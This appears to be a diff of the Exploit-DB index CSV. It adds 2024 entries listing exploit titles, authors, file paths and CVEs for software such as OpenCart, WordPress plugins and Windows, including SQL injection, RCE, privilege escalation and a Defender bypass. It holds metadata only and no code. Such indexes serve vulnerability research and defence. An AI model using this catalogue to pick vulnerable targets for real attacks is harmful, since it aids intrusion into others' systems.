 34935,exploits/php/webapps/34935.txt,"LES PACKS - 'ID' SQL Injection",2010-10-27,Cru3l.b0y,webapps,php,,2010-10-27,2014-10-11,1,,,,,,https://www.securityfocus.com/bid/44457/info
 2449,exploits/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Inclusion",2006-09-28,D_7J,webapps,php,,2006-09-27,,1,,,,,,
 28727,exploits/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusions",2006-09-28,D_7J,webapps,php,,2006-09-28,2013-10-04,1,,,,,,https://www.securityfocus.com/bid/20259/info
@@ -24920,6 +24937,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48945,exploits/php/webapps/48945.txt,"Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-26,"Akıner Kısa",webapps,php,,2020-10-26,2020-10-26,0,,,,,,
 48482,exploits/php/webapps/48482.txt,"Online Healthcare management system 1.0 - Authentication Bypass",2020-05-18,BKpatron,webapps,php,,2020-05-18,2020-05-18,0,,,,,,
 48481,exploits/php/webapps/48481.txt,"Online Healthcare Patient Record Management System 1.0 - Authentication Bypass",2020-05-18,"Daniel Monzón",webapps,php,,2020-05-18,2020-05-18,0,,,,,,
+51938,exploits/php/webapps/51938.py,"Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)",2024-04-02,"Gian Paris C. Agsam",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 41181,exploits/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",webapps,php,,2017-01-27,2017-01-27,0,,,,,,
 49428,exploits/php/webapps/49428.txt,"Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
 49429,exploits/php/webapps/49429.txt,"Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
@@ -25162,6 +25180,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",2021-11-29,"Hubert Wojciechowski",webapps,php,,2021-11-29,2021-11-30,0,,,,,http://www.exploit-db.comopencart-3.0.3.8.zip,
 49407,exploits/php/webapps/49407.txt,"OpenCart 3.0.36 - ATO via Cross Site Request Forgery",2021-01-11,"Mahendra Purbia",webapps,php,,2021-01-11,2021-01-11,0,,,,,,
 47331,exploits/php/webapps/47331.txt,"Opencart 3.x - Cross-Site Scripting",2019-09-02,"Nipun Somani",webapps,php,,2019-09-02,2019-09-02,0,CVE-2019-15081,,,,,
+51940,exploits/php/webapps/51940.txt,"OpenCart Core 4.0.2.3 - 'search' SQLi",2024-04-02,"Saud Alenazi",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 49044,exploits/php/webapps/49044.txt,"OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure",2020-11-13,"Jinson Varghese Behanan",webapps,php,,2020-11-13,2020-11-13,0,CVE-2020-15478,,,,,
 50942,exploits/php/webapps/50942.txt,"OpenCart v3.x Newsletter Module - Blind SQLi",2022-05-23,"Saud Alenazi",webapps,php,,2022-05-23,2022-05-23,0,,,,,,
 12475,exploits/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,cr4wl3r,webapps,php,,2010-04-30,,1,OSVDB-64183;CVE-2010-1999,,,,http://www.exploit-db.comopenmairie_catalogue_1.024.zip,
@@ -25827,6 +25846,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41586,exploits/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php,,2017-03-11,2017-03-11,0,,,,,,
 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-29,Mr.Gedik,webapps,php,,2021-09-29,2021-09-29,0,,,,,,
 38391,exploits/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,webapps,php,,2013-03-14,2015-10-03,1,,,,,,https://www.securityfocus.com/bid/58508/info
+51943,exploits/php/webapps/51943.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 51032,exploits/php/webapps/51032.py,"pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)",2023-02-20,IHTeam,webapps,php,,2023-02-20,2023-02-20,0,CVE-2022-31814,,,,,
 6442,exploits/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48109;CVE-2008-4355,,,,,
 23901,exploits/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",webapps,php,,2013-01-05,2013-04-15,1,OSVDB-88930;OSVDB-88929;OSVDB-88928,,,http://www.exploit-db.com/screenshots/idlt24000/screenshot.png,,
@@ -29579,6 +29599,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35290,exploits/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,webapps,php,,2011-01-26,2014-11-18,1,,,,,,https://www.securityfocus.com/bid/46033/info
 50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",2021-09-17,"Abdullah Khawaja",webapps,php,,2021-09-17,2021-09-17,0,,,,,,
 50312,exploits/php/webapps/50312.txt,"Simple Attendance System 1.0 - Unauthenticated Blind SQLi",2021-09-22,"()t/\\/\\1",webapps,php,,2021-09-22,2021-09-22,0,,,,,,
+51937,exploits/php/webapps/51937.txt,"Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal",2024-04-02,Ven3xy,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 40518,exploits/php/webapps/40518.txt,"Simple Blog PHP 2.0 - Multiple Vulnerabilities",2016-10-13,"Ehsan Hosseini",webapps,php,,2016-10-13,2016-10-13,0,,,,,,
 40519,exploits/php/webapps/40519.txt,"Simple Blog PHP 2.0 - SQL Injection",2016-10-13,"Ehsan Hosseini",webapps,php,,2016-10-13,2016-10-13,0,,,,,,
 12006,exploits/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde - Arbitrary File Upload",2010-04-01,indoushka,webapps,php,,2010-03-31,,0,,,,,,
@@ -29903,6 +29924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
 10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
 5003,exploits/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,webapps,php,,2008-01-28,2016-11-14,1,OSVDB-40780;CVE-2008-0503,,,,http://www.exploit-db.comsmart-publisher-1.0.1.zip,
+51958,exploits/php/webapps/51958.txt,"Smart School 6.4.1 - SQL Injection",2024-04-02,CraCkEr,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 51472,exploits/php/webapps/51472.txt,"Smart School v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80,2018-07-18,2018-07-18,0,,"SQL Injection (SQLi)",,,,
 34067,exploits/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,webapps,php,,2010-01-10,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40468/info
@@ -32795,6 +32817,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32444,exploits/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - '/wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",webapps,php,,2008-09-29,2014-03-23,1,CVE-2008-4671;OSVDB-48635,,,,,https://www.securityfocus.com/bid/31482/info
 5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - 'active_plugins' Code Execution",2008-02-05,"Alexander Concha",webapps,php,,2008-02-04,,1,OSVDB-41134;CVE-2008-5695,"WordPress Plugin",,,,http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
 8196,exploits/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",webapps,php,,2009-03-09,,1,OSVDB-52814;CVE-2009-1030,,,,,
+51959,exploits/php/webapps/51959.txt,"Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)",2024-04-02,"Milad karimi",webapps,php,,2024-04-02,2024-04-02,0,CVE-2022-4395,,,,,
 35212,exploits/php/webapps/35212.txt,"WordPress Plugin / Joomla! Component XCloner - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",webapps,php,80,2014-11-10,2014-11-10,0,OSVDB-114181;CVE-2014-8607;CVE-2014-8606;CVE-2014-8605;CVE-2014-8604;CVE-2014-8603;OSVDB-114180;OSVDB-114179;OSVDB-114178;OSVDB-114177;OSVDB-114176,"WordPress Plugin",,,http://www.exploit-db.comxcloner-backup-and-restore.3.1.1.zip,http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/
 35057,exploits/php/webapps/35057.py,"WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload",2014-10-25,"Claudio Viviani",webapps,php,,2014-10-25,2014-10-25,0,OSVDB-113673;OSVDB-113669;CVE-2014-8739,,,,,
 35430,exploits/php/webapps/35430.txt,"WordPress Plugin 1 Flash Gallery 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",webapps,php,,2011-03-08,2014-12-02,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/46783/info
@@ -39649,6 +39672,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows,,2006-12-18,2016-10-27,1,OSVDB-32356;CVE-2006-6665,,,,,
 48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,,2020-03-12,2020-03-12,0,,,,,,
 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,,2020-03-11,2020-03-11,0,,,,,,
+51939,exploits/windows/local/51939.txt,"ASUS Control Center Express 01.06.15 - Unquoted Service Path",2024-04-02,"Alaa Kachouh",local,windows,,2024-04-02,2024-04-02,0,,,,,,
 50985,exploits/windows/local/50985.txt,"Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path",2022-07-29,"Angelo Pio Amirante",local,windows,,2022-07-29,2022-07-29,0,CVE-2022-35899,,,,,
 48173,exploits/windows/local/48173.txt,"ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path",2020-03-06,"Oscar Flores",local,windows,,2020-03-06,2020-03-06,0,,,,,,
 49888,exploits/windows/local/49888.txt,"ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path",2021-05-20,"Alejandra Sánchez",local,windows,,2021-05-20,2021-05-20,0,,,,,,
@@ -40958,6 +40982,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,,2019-11-19,2019-11-19,0,CVE-2019-1405;CVE-2019-1322,,,,,https://github.com/apt69/COMahawk
 47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,,2020-01-13,2020-01-13,0,,,,,,
 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,,2019-07-12,2019-07-12,1,CVE-2019-1019,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1817
+51946,exploits/windows/local/51946.rb,"Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation",2024-04-02,"E1 Coders",local,windows,,2024-04-02,2024-04-02,0,CVE-2024-21338,,,,,
 51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,,
 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
 14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
@@ -40980,6 +41005,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",2021-09-24,hyp3rlinx,local,windows,,2021-09-24,2021-09-24,0,,,,,,
 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,,2019-01-23,2019-01-24,1,,,,,,
 46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,,2019-01-17,2019-01-18,1,,,,,,
+51960,exploits/windows/local/51960.txt,"Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G",2024-04-02,hyp3rlinx,local,windows,,2024-04-02,2024-04-02,0,,,,,,
 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",2022-01-12,hyp3rlinx,local,windows,,2022-01-12,2022-01-12,0,,,,,,
 51873,exploits/windows/local/51873.txt,"Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass",2024-03-11,hyp3rlinx,local,windows,,2024-03-11,2024-03-11,0,,,,,,
 40562,exploits/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",local,windows,,2016-10-17,2016-10-17,1,CVE-2016-7188;MS16-125,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=887
@@ -41477,6 +41503,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51611,exploits/windows/local/51611.py,"RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)",2023-07-20,"Andre Nogueira",local,windows,,2023-07-20,2023-07-20,0,,,,,,
 8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,local,windows,,2009-03-09,,1,OSVDB-52534,,,,,
 40145,exploits/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,local,windows,,2016-07-25,2016-07-25,1,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5344.php
+51941,exploits/windows/local/51941.txt,"Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path",2024-04-02,"Saud Alenazi",local,windows,,2024-04-02,2024-04-02,0,,,,,,
 48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,,2020-09-14,2020-09-14,0,,,,,,
 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,,2019-04-25,2019-04-25,1,CVE-2018-20250,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwrar561tr.exe,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/fileformat/winrar_ace.rb
 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,,2019-04-25,2019-04-25,1,CVE-2018-20250,Local,,,http://www.exploit-db.comwrar561tr.exe,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/fileformat/winrar_ace.rb